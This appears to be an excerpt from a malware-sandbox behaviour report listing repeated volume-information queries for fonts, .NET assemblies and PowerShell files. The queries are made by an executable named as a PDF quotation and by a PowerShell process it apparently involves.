Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformationJump to behavior
